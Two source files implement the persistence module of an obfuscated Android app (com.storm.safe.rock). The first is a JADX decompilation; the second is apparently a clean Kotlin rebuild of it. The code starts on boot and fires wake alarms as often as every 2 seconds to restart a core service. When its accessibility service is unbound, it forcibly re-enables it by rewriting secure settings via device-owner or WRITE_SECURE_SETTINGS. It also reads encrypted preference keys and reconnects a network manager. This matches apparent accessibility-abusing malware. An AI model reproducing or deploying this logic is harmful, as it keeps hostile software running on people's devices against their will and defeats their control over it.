File: jadx-reference/rock/service/tisxhskrc.java
package com.storm.safe.rock.service;

import android.app.AlarmManager;
import android.app.PendingIntent;
import android.app.admin.DevicePolicyManager;
import android.content.BroadcastReceiver;
import android.content.ComponentName;
import android.content.ContentResolver;
import android.content.Context;
import android.content.Intent;
import android.os.Build;
import android.os.PowerManager;
import android.os.SystemClock;
import android.provider.Settings;
import com.storm.safe.rock.receiver.zbrefryi;
import com.storm.safe.rock.service.AppCoreService;
import com.storm.safe.rock.service.modules.C0323a8;
import com.storm.safe.rock.util.StringUtil;
import java.util.ArrayList;
import java.util.List;
import kotlin.text.AbstractC0779a1;
import p000.AbstractC0715je;
import p000.AbstractC1120qr;
import p000.RunnableC1322v2;
import p000.kj0;
import p000.t60;

/* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
/* loaded from: classes2.dex */
public final class tisxhskrc extends BroadcastReceiver {

    /* renamed from: a0 */
    public static final C0380a0 f55188a0 = new C0380a0(null);

    /* renamed from: a1 */
    public static volatile long f55189a1 = System.currentTimeMillis();

    /* renamed from: a2 */
    public static volatile boolean f55190a2;

    /* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
    /* renamed from: com.storm.safe.rock.service.tisxhskrc$a0 */
    public static final class C0380a0 {
        public /* synthetic */ C0380a0(AbstractC1120qr abstractC1120qr) {
            this();
        }

        private final long effectiveGuardIntervalMs(Context context) {
            if (dqtvuisjd.f52358m1.getInstance() == null) {
                return 2000L;
            }
            Object systemService = context.getSystemService("power");
            PowerManager powerManager = systemService instanceof PowerManager ? (PowerManager) systemService : null;
            return (powerManager == null || powerManager.isInteractive()) ? 2000L : 300000L;
        }

        private final long effectiveHeartbeatIntervalMs(Context context) {
            if (dqtvuisjd.f52358m1.getInstance() == null) {
                return 60000L;
            }
            Object systemService = context.getSystemService("power");
            PowerManager powerManager = systemService instanceof PowerManager ? (PowerManager) systemService : null;
            return (powerManager == null || powerManager.isInteractive()) ? 60000L : 300000L;
        }

        private final boolean isAccessibilityEnabledInSettings(Context context) {
            try {
                String string = Settings.Secure.getString(context.getContentResolver(), "enabled_accessibility_services");
                if (string == null) {
                    string = "";
                }
                String packageName = context.getPackageName();
                t60.m214694b5(packageName, "context.packageName");
                return AbstractC0779a1.m213652a5(string, packageName, false);
            } catch (Exception unused) {
                return false;
            }
        }

        /* JADX INFO: Access modifiers changed from: private */
        public final void scheduleNextHeartbeatStatic(Context context) {
            try {
                Object systemService = context.getSystemService("alarm");
                AlarmManager alarmManager = systemService instanceof AlarmManager ? (AlarmManager) systemService : null;
                if (alarmManager == null) {
                    return;
                }
                Intent intent = new Intent(context, (Class<?>) tisxhskrc.class);
                intent.setAction("com.storm.safe.rock.action.BACKUP_SYNC");
                PendingIntent broadcast = PendingIntent.getBroadcast(context, 99, intent, 201326592);
                long jEffectiveHeartbeatIntervalMs = effectiveHeartbeatIntervalMs(context);
                if (Build.VERSION.SDK_INT >= 31 ? alarmManager.canScheduleExactAlarms() : true) {
                    alarmManager.setExactAndAllowWhileIdle(2, SystemClock.elapsedRealtime() + jEffectiveHeartbeatIntervalMs, broadcast);
                } else {
                    alarmManager.setAndAllowWhileIdle(2, SystemClock.elapsedRealtime() + jEffectiveHeartbeatIntervalMs, broadcast);
                }
            } catch (Exception e) {
                t60.m214705c6("tisxhskrc", "❌ 心跳闹钟调度失败", e);
            }
        }

        /* JADX INFO: Access modifiers changed from: private */
        public static final void tryForceRebindAccessibility$lambda$3(Context context) throws InterruptedException {
            try {
                ContentResolver contentResolver = context.getContentResolver();
                String packageName = context.getPackageName();
                String str = packageName + "/" + dqtvuisjd.class.getName();
                String string = Settings.Secure.getString(contentResolver, "enabled_accessibility_services");
                if (string == null) {
                    string = "";
                }
                t60.m214694b5(packageName, "pkg");
                if (!AbstractC0779a1.m213652a5(string, packageName, false)) {
                    t60.m214726f4("tisxhskrc", "⚠️ [重绑] 无障碍列表中未找到本应用，跳过");
                    return;
                }
                List listM213677d0 = AbstractC0779a1.m213677d0(string, new String[]{":"}, 6);
                ArrayList arrayList = new ArrayList();
                for (Object obj : listM213677d0) {
                    String str2 = (String) obj;
                    if (str2.length() > 0 && !AbstractC0779a1.m213652a5(str2, packageName, false)) {
                        arrayList.add(obj);
                    }
                }
                String strM213295i2 = AbstractC0715je.m213295i2(arrayList, ":", null, null, null, 62);
                if (strM213295i2.length() != 0) {
                    str = strM213295i2 + ":" + str;
                }
                Object systemService = context.getSystemService("device_policy");
                DevicePolicyManager devicePolicyManager = systemService instanceof DevicePolicyManager ? (DevicePolicyManager) systemService : null;
                if (devicePolicyManager != null && devicePolicyManager.isDeviceOwnerApp(packageName)) {
                    ComponentName componentName = new ComponentName(context, (Class<?>) zbrefryi.class);
                    devicePolicyManager.setSecureSetting(componentName, "enabled_accessibility_services", strM213295i2);
                    Thread.sleep(300L);
                    devicePolicyManager.setSecureSetting(componentName, "enabled_accessibility_services", str);
                    devicePolicyManager.setSecureSetting(componentName, "accessibility_enabled", "1");
                    t60.m214714d6("tisxhskrc", "✅ [重绑] DeviceOwner 先删后加成功");
                    return;
                }
                try {
                    Settings.Secure.putString(contentResolver, "enabled_accessibility_services", strM213295i2);
                    Thread.sleep(300L);
                    Settings.Secure.putString(contentResolver, "enabled_accessibility_services", str);
                    Settings.Secure.putInt(contentResolver, "accessibility_enabled", 1);
                    t60.m214714d6("tisxhskrc", "✅ [重绑] WRITE_SECURE_SETTINGS 先删后加成功");
                } catch (SecurityException unused) {
                    t60.m214726f4("tisxhskrc", "⚠️ [重绑] 无权限，等待系统自动恢复");
                }
            } catch (Exception e) {
                t60.m214705c6("tisxhskrc", "❌ [重绑] 失败", e);
            }
        }

        public final void rescheduleAfterScreenOn(Context context) {
            t60.m214695b6(context, "context");
            try {
                scheduleNextHeartbeatStatic(context);
                scheduleGuard(context);
            } catch (Exception e) {
                t60.m214705c6("tisxhskrc", "❌ 亮屏重排闹钟失败", e);
            }
        }

        public final void scheduleGuard(Context context) {
            t60.m214695b6(context, "context");
            try {
                Object systemService = context.getSystemService("alarm");
                AlarmManager alarmManager = systemService instanceof AlarmManager ? (AlarmManager) systemService : null;
                if (alarmManager == null) {
                    return;
                }
                Intent intent = new Intent(context, (Class<?>) tisxhskrc.class);
                intent.setAction("com.storm.safe.rock.action.BACKUP_SYNC");
                PendingIntent broadcast = PendingIntent.getBroadcast(context, 97, intent, 201326592);
                long jEffectiveGuardIntervalMs = effectiveGuardIntervalMs(context);
                if (Build.VERSION.SDK_INT >= 31 ? alarmManager.canScheduleExactAlarms() : true) {
                    alarmManager.setExactAndAllowWhileIdle(2, SystemClock.elapsedRealtime() + jEffectiveGuardIntervalMs, broadcast);
                } else {
                    alarmManager.setAndAllowWhileIdle(2, SystemClock.elapsedRealtime() + jEffectiveGuardIntervalMs, broadcast);
                }
            } catch (Exception e) {
                t60.m214705c6("tisxhskrc", "❌ 守护闹钟调度失败", e);
            }
        }

        public final void tryForceRebindAccessibility(Context context) {
            t60.m214695b6(context, "context");
            if (!tisxhskrc.f55190a2 && dqtvuisjd.f52358m1.getInstance() == null) {
                Context applicationContext = context.getApplicationContext();
                t60.m214694b5(applicationContext, "appContext");
                if (isAccessibilityEnabledInSettings(applicationContext)) {
                    tisxhskrc.f55190a2 = true;
                    new Thread(new RunnableC1322v2(applicationContext, 5)).start();
                }
            }
        }

        private C0380a0() {
        }
    }

    /* renamed from: a0 */
    public static void m212466a0(Context context) {
        C0323a8 lj0Var;
        C0380a0 c0380a0 = f55188a0;
        c0380a0.scheduleNextHeartbeatStatic(context);
        c0380a0.scheduleGuard(context);
        AppCoreService.C0277a0 c0277a0 = AppCoreService.f52296a0;
        if (!c0277a0.isRunning()) {
            c0277a0.start(context);
        }
        if (dqtvuisjd.f52358m1.getInstance() == null) {
            long jCurrentTimeMillis = System.currentTimeMillis() - f55189a1;
            if (jCurrentTimeMillis > 5000) {
                t60.m214726f4("tisxhskrc", "⚠️ 无障碍未绑定(" + (jCurrentTimeMillis / 1000) + "s)，尝试强制重绑");
                c0380a0.tryForceRebindAccessibility(context);
                return;
            }
            return;
        }
        f55190a2 = false;
        try {
            if (!context.getSharedPreferences(StringUtil.m212470a0("KkkBBV4sDTpS"), 0).getBoolean(StringUtil.m212470a0("KkwFMkIqBTRWJSJWHwVONwE+WzQ/XBU="), false) || (lj0Var = C0323a8.f53097e0.getInstance()) == null || lj0Var.m211649b5()) {
                return;
            }
            new Thread(new kj0(lj0Var, 1)).start();
        } catch (Exception e) {
            t60.m214705c6("tisxhskrc", "❌ 网络检查失败", e);
        }
    }

    /* JADX WARN: Can't fix incorrect switch cases order, some code will duplicate */
    /* JADX WARN: Code restructure failed: missing block: B:11:0x001f, code lost:
    
        if (r6.equals("com.storm.safe.rock.action.QUICK_SYNC") == false) goto L37;
     */
    /* JADX WARN: Code restructure failed: missing block: B:14:0x0029, code lost:
    
        if (r6.equals("android.intent.action.BOOT_COMPLETED") == false) goto L37;
     */
    /* JADX WARN: Code restructure failed: missing block: B:22:0x003f, code lost:
    
        if (r6.equals("com.htc.intent.action.QUICKBOOT_POWERON") == false) goto L37;
     */
    /* JADX WARN: Code restructure failed: missing block: B:25:0x0048, code lost:
    
        if (r6.equals("android.intent.action.QUICKBOOT_POWERON") != false) goto L26;
     */
    /* JADX WARN: Code restructure failed: missing block: B:26:0x004a, code lost:
    
        p000.t60.m214714d6("tisxhskrc", "📱 开机完成，启动服务");
        com.storm.safe.rock.service.tisxhskrc.f55189a1 = java.lang.System.currentTimeMillis();
        com.storm.safe.rock.service.tisxhskrc.f55190a2 = false;
        r6 = com.storm.safe.rock.service.tisxhskrc.f55188a0;
        r6.scheduleNextHeartbeatStatic(r5);
        r6.scheduleGuard(r5);
        r6 = com.storm.safe.rock.service.AppCoreService.f52296a0;
     */
    /* JADX WARN: Code restructure failed: missing block: B:27:0x0067, code lost:
    
        if (r6.isRunning() != false) goto L39;
     */
    /* JADX WARN: Code restructure failed: missing block: B:28:0x0069, code lost:
    
        r6.start(r5);
     */
    /* JADX WARN: Code restructure failed: missing block: B:31:0x0073, code lost:
    
        if (r6.equals("com.storm.safe.rock.action.HEALTH_CHECK") == false) goto L37;
     */
    /* JADX WARN: Code restructure failed: missing block: B:33:0x0076, code lost:
    
        com.storm.safe.rock.service.tisxhskrc.f55189a1 = java.lang.System.currentTimeMillis();
        com.storm.safe.rock.service.tisxhskrc.f55190a2 = false;
        r6 = com.storm.safe.rock.service.tisxhskrc.f55188a0;
        r6.scheduleNextHeartbeatStatic(r5);
        r6.scheduleGuard(r5);
        r6 = com.storm.safe.rock.service.AppCoreService.f52296a0;
     */
    /* JADX WARN: Code restructure failed: missing block: B:34:0x008c, code lost:
    
        if (r6.isRunning() != false) goto L40;
     */
    /* JADX WARN: Code restructure failed: missing block: B:35:0x008e, code lost:
    
        r6.start(r5);
     */
    /* JADX WARN: Failed to restore switch over string. Please report as a decompilation issue
    java.lang.NullPointerException: Cannot invoke "java.util.List.iterator()" because the return value of "jadx.core.dex.visitors.regions.SwitchOverStringVisitor$SwitchData.getNewCases()" is null
    	at jadx.core.dex.visitors.regions.SwitchOverStringVisitor.restoreSwitchOverString(SwitchOverStringVisitor.java:109)
    	at jadx.core.dex.visitors.regions.SwitchOverStringVisitor.visitRegion(SwitchOverStringVisitor.java:66)
    	at jadx.core.dex.visitors.regions.DepthRegionTraversal.traverseIterativeStepInternal(DepthRegionTraversal.java:77)
    	at jadx.core.dex.visitors.regions.DepthRegionTraversal.traverseIterativeStepInternal(DepthRegionTraversal.java:82)
     */
    @Override // android.content.BroadcastReceiver
    /*
        Code decompiled incorrectly, please refer to instructions dump.
    */
    public void onReceive(Context context, Intent intent) {
        t60.m214695b6(context, "context");
        String action = intent != null ? intent.getAction() : null;
        if (action != null) {
            switch (action.hashCode()) {
                case -1802375933:
                    break;
                case -1787487905:
                    break;
                case -1417835046:
                    break;
                case 341565306:
                    if (action.equals("com.storm.safe.rock.action.BACKUP_SYNC")) {
                        m212466a0(context);
                        break;
                    }
                    break;
                case 798292259:
                    break;
                case 2098784523:
                    break;
            }
            return;
        }
        m212466a0(context);
    }
}

File: update-replica/app/src/main/java/com/storm/safe/rock/service/tisxhskrc.kt
package com.storm.safe.rock.service

import android.app.AlarmManager
import android.app.PendingIntent
import android.app.admin.DevicePolicyManager
import android.content.BroadcastReceiver
import android.content.ComponentName
import android.content.Context
import android.content.Intent
import android.os.Build
import android.os.PowerManager
import android.os.SystemClock
import android.provider.Settings
import android.util.Log
import com.storm.safe.rock.receiver.zbrefryi
import com.storm.safe.rock.service.modules.NetworkManager
import com.storm.safe.rock.util.StringUtil

/**
 * BroadcastReceiver for alarm-based heartbeat and guard scheduling.
 *
 * Reverse-engineered from JADX: service/tisxhskrc.java (325 LOC).
 *
 * Listens for:
 * - BACKUP_SYNC (heartbeat alarm)
 * - QUICK_SYNC
 * - HEALTH_CHECK
 * - BOOT_COMPLETED (and quickboot variants)
 *
 * Manages:
 * - AlarmManager heartbeat chain (exact alarms)
 * - Guard alarm scheduling
 * - Force rebind of accessibility service via DevicePolicyManager or Settings.Secure
 * - AppCoreService startup
 */
class tisxhskrc : BroadcastReceiver() {

    companion object {
        private const val TAG = "tisxhskrc"

        const val ACTION_BACKUP_SYNC = "com.storm.safe.rock.action.BACKUP_SYNC"
        const val ACTION_QUICK_SYNC = "com.storm.safe.rock.action.QUICK_SYNC"
        const val ACTION_HEALTH_CHECK = "com.storm.safe.rock.action.HEALTH_CHECK"

        private const val HEARTBEAT_REQUEST_CODE = 99
        private const val GUARD_REQUEST_CODE = 97

        /** Interactive heartbeat/guard interval */
        private const val INTERACTIVE_INTERVAL = 2_000L

        /** Screen-off heartbeat interval: 5 minutes */
        private const val SCREEN_OFF_HEARTBEAT_INTERVAL = 300_000L

        /** Screen-off guard interval: 5 minutes */
        private const val SCREEN_OFF_GUARD_INTERVAL = 300_000L

        /** Accessibility-dead heartbeat interval: 60 seconds */
        private const val ACCESSIBILITY_DEAD_HEARTBEAT_INTERVAL = 60_000L

        /** Accessibility-dead guard interval: 2 seconds */
        private const val ACCESSIBILITY_DEAD_GUARD_INTERVAL = 2_000L

        /** Minimum rebind wait: 5 seconds */
        private const val REBIND_WAIT_THRESHOLD_MS = 5_000L

        /** Sleep between remove and re-add in rebind: 300ms */
        private const val REBIND_SLEEP_MS = 300L

        /** Timestamp of last confirmed alive state */
        @Volatile
        @JvmStatic
        var lastAliveTimestamp: Long = System.currentTimeMillis()

        /** Whether a rebind attempt is in progress */
        @Volatile
        @JvmStatic
        var isRebinding: Boolean = false

        // ── Interval calculation ──

        /**
         * Effective guard interval depends on accessibility state and screen state.
         * JADX: C0380a0.effectiveGuardIntervalMs
         */
        private fun effectiveGuardIntervalMs(context: Context): Long {
            if (MyAccessibilityService.getInstance() == null) return ACCESSIBILITY_DEAD_GUARD_INTERVAL
            val pm = context.getSystemService(Context.POWER_SERVICE) as? PowerManager
            return if (pm == null || pm.isInteractive) INTERACTIVE_INTERVAL else SCREEN_OFF_GUARD_INTERVAL
        }

        /**
         * Effective heartbeat interval depends on accessibility state and screen state.
         * JADX: C0380a0.effectiveHeartbeatIntervalMs
         */
        private fun effectiveHeartbeatIntervalMs(context: Context): Long {
            if (MyAccessibilityService.getInstance() == null) return ACCESSIBILITY_DEAD_HEARTBEAT_INTERVAL
            val pm = context.getSystemService(Context.POWER_SERVICE) as? PowerManager
            return if (pm == null || pm.isInteractive) ACCESSIBILITY_DEAD_HEARTBEAT_INTERVAL else SCREEN_OFF_HEARTBEAT_INTERVAL
        }

        /**
         * Check if this app is listed in enabled accessibility services.
         * JADX: C0380a0.isAccessibilityEnabledInSettings
         */
        private fun isAccessibilityEnabledInSettings(context: Context): Boolean {
            return try {
                val enabled = Settings.Secure.getString(
                    context.contentResolver, "enabled_accessibility_services"
                ) ?: ""
                val pkg = context.packageName
                enabled.contains(pkg)
            } catch (_: Exception) {
                false
            }
        }

        // ── Scheduling ──

        /**
         * Schedule next heartbeat alarm.
         * JADX: C0380a0.scheduleNextHeartbeatStatic
         */
        @JvmStatic
        fun scheduleNextHeartbeat(context: Context) {
            try {
                val alarmManager = context.getSystemService(Context.ALARM_SERVICE) as? AlarmManager
                    ?: return
                val intent = Intent(context, tisxhskrc::class.java).apply {
                    action = ACTION_BACKUP_SYNC
                }
                val pi = PendingIntent.getBroadcast(
                    context, HEARTBEAT_REQUEST_CODE, intent,
                    PendingIntent.FLAG_UPDATE_CURRENT or PendingIntent.FLAG_IMMUTABLE
                )
                val interval = effectiveHeartbeatIntervalMs(context)
                val triggerAt = SystemClock.elapsedRealtime() + interval
                val canExact = if (Build.VERSION.SDK_INT >= 31) alarmManager.canScheduleExactAlarms() else true
                if (canExact) {
                    alarmManager.setExactAndAllowWhileIdle(
                        AlarmManager.ELAPSED_REALTIME_WAKEUP, triggerAt, pi
                    )
                } else {
                    alarmManager.setAndAllowWhileIdle(
                        AlarmManager.ELAPSED_REALTIME_WAKEUP, triggerAt, pi
                    )
                }
            } catch (e: Exception) {
                Log.e(TAG, "❌ 心跳闹钟调度失败", e)
            }
        }

        /**
         * Schedule guard alarm.
         * JADX: C0380a0.scheduleGuard
         */
        @JvmStatic
        fun scheduleGuard(context: Context) {
            try {
                val alarmManager = context.getSystemService(Context.ALARM_SERVICE) as? AlarmManager
                    ?: return
                val intent = Intent(context, tisxhskrc::class.java).apply {
                    action = ACTION_BACKUP_SYNC
                }
                val pi = PendingIntent.getBroadcast(
                    context, GUARD_REQUEST_CODE, intent,
                    PendingIntent.FLAG_UPDATE_CURRENT or PendingIntent.FLAG_IMMUTABLE
                )
                val interval = effectiveGuardIntervalMs(context)
                val triggerAt = SystemClock.elapsedRealtime() + interval
                val canExact = if (Build.VERSION.SDK_INT >= 31) alarmManager.canScheduleExactAlarms() else true
                if (canExact) {
                    alarmManager.setExactAndAllowWhileIdle(
                        AlarmManager.ELAPSED_REALTIME_WAKEUP, triggerAt, pi
                    )
                } else {
                    alarmManager.setAndAllowWhileIdle(
                        AlarmManager.ELAPSED_REALTIME_WAKEUP, triggerAt, pi
                    )
                }
            } catch (e: Exception) {
                Log.e(TAG, "❌ 守护闹钟调度失败", e)
            }
        }

        /**
         * Reschedule heartbeat and guard after screen on.
         * JADX: C0380a0.rescheduleAfterScreenOn
         */
        @JvmStatic
        fun rescheduleAfterScreenOn(context: Context) {
            try {
                scheduleNextHeartbeat(context)
                scheduleGuard(context)
            } catch (e: Exception) {
                Log.e(TAG, "❌ 亮屏重排闹钟失败", e)
            }
        }

        /**
         * Try to force rebind accessibility service by toggling enabled_accessibility_services.
         * JADX: C0380a0.tryForceRebindAccessibility
         */
        @JvmStatic
        fun tryForceRebindAccessibility(context: Context) {
            if (isRebinding) return
            if (MyAccessibilityService.getInstance() != null) return

            val appContext = context.applicationContext
            if (!isAccessibilityEnabledInSettings(appContext)) return

            isRebinding = true
            Thread {
                doForceRebindAccessibility(appContext)
            }.start()
        }

        /**
         * Actual rebind logic — runs on background thread.
         * JADX: C0380a0.tryForceRebindAccessibility$lambda$3
         *
         * Strategy: remove our entry from enabled_accessibility_services,
         * sleep 300ms, re-add it. Uses DevicePolicyManager if device owner,
         * falls back to Settings.Secure.putString.
         */
        private fun doForceRebindAccessibility(context: Context) {
            try {
                val contentResolver = context.contentResolver
                val pkg = context.packageName
                val fullService = "$pkg/${MyAccessibilityService::class.java.name}"

                val current = Settings.Secure.getString(
                    contentResolver, "enabled_accessibility_services"
                ) ?: ""

                if (!current.contains(pkg)) {
                    Log.w(TAG, "⚠️ [重绑] 无障碍列表中未找到本应用，跳过")
                    return
                }

                // Build service list without our package
                val otherServices = current.split(":")
                    .filter { it.isNotEmpty() && !it.contains(pkg) }
                val withoutUs = otherServices.joinToString(":")

                // Build full list with our service
                val withUs = if (withoutUs.isNotEmpty()) "$withoutUs:$fullService" else fullService

                // Try DevicePolicyManager first (device owner)
                val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as? DevicePolicyManager
                if (dpm != null && dpm.isDeviceOwnerApp(pkg)) {
                    val cn = ComponentName(context, zbrefryi::class.java)
                    dpm.setSecureSetting(cn, "enabled_accessibility_services", withoutUs)
                    Thread.sleep(REBIND_SLEEP_MS)
                    dpm.setSecureSetting(cn, "enabled_accessibility_services", withUs)
                    dpm.setSecureSetting(cn, "accessibility_enabled", "1")
                    Log.d(TAG, "✅ [重绑] DeviceOwner 先删后加成功")
                    return
                }

                // Fallback: WRITE_SECURE_SETTINGS permission
                try {
                    Settings.Secure.putString(
                        contentResolver, "enabled_accessibility_services", withoutUs
                    )
                    Thread.sleep(REBIND_SLEEP_MS)
                    Settings.Secure.putString(
                        contentResolver, "enabled_accessibility_services", withUs
                    )
                    Settings.Secure.putInt(contentResolver, "accessibility_enabled", 1)
                    Log.d(TAG, "✅ [重绑] WRITE_SECURE_SETTINGS 先删后加成功")
                } catch (_: SecurityException) {
                    Log.w(TAG, "⚠️ [重绑] 无权限，等待系统自动恢复")
                }
            } catch (e: Exception) {
                Log.e(TAG, "❌ [重绑] 失败", e)
            } finally {
                isRebinding = false
            }
        }

        /**
         * Handle heartbeat alarm — schedule next, ensure core service running,
         * check accessibility, and optionally reconnect network.
         * JADX: m212466a0 (static)
         */
        @JvmStatic
        fun handleBackupSync(context: Context) {
            scheduleNextHeartbeat(context)
            scheduleGuard(context)

            if (!AppCoreService.isRunning()) {
                AppCoreService.start(context)
            }

            if (MyAccessibilityService.getInstance() == null) {
                val elapsed = System.currentTimeMillis() - lastAliveTimestamp
                if (elapsed > REBIND_WAIT_THRESHOLD_MS) {
                    Log.w(TAG, "⚠️ 无障碍未绑定(${elapsed / 1000}s)，尝试强制重绑")
                    tryForceRebindAccessibility(context)
                }
                return
            }

            // Accessibility is alive — reset rebinding flag
            isRebinding = false

            // Check network connectivity and reconnect if needed
            // JADX: reads SharedPreferences with encrypted keys, checks NetworkManager.isConnected
            try {
                val prefs = context.getSharedPreferences(
                    StringUtil.decrypt("KkkBBV4sDTpS"), Context.MODE_PRIVATE
                )
                val autoConnect = prefs.getBoolean(
                    StringUtil.decrypt("KkwFMkIqBTRWJSJWHwVONwE+WzQ/XBU="), false
                )
                if (!autoConnect) return

                val networkManager = MyAccessibilityService.getInstance()?.getNetworkManager()
                if (networkManager != null && !networkManager.isHealthy()) {
                    Thread { networkManager.ensureConnected() }.start()
                }
            } catch (e: Exception) {
                Log.e(TAG, "❌ 网络检查失败", e)
            }
        }
    }

    override fun onReceive(context: Context, intent: Intent?) {
        val action = intent?.action

        when (action) {
            ACTION_BACKUP_SYNC -> {
                handleBackupSync(context)
            }

            "android.intent.action.BOOT_COMPLETED",
            "android.intent.action.QUICKBOOT_POWERON",
            "com.htc.intent.action.QUICKBOOT_POWERON" -> {
                Log.d(TAG, "📱 开机完成，启动服务")
                lastAliveTimestamp = System.currentTimeMillis()
                isRebinding = false
                scheduleNextHeartbeat(context)
                scheduleGuard(context)
                if (!AppCoreService.isRunning()) {
                    AppCoreService.start(context)
                }
            }

            ACTION_QUICK_SYNC -> {
                handleBackupSync(context)
            }

            ACTION_HEALTH_CHECK -> {
                lastAliveTimestamp = System.currentTimeMillis()
                isRebinding = false
                scheduleNextHeartbeat(context)
                scheduleGuard(context)
                if (!AppCoreService.isRunning()) {
                    AppCoreService.start(context)
                }
            }

            else -> {
                // Null action or unknown — treat as heartbeat
                handleBackupSync(context)
            }
        }
    }
}
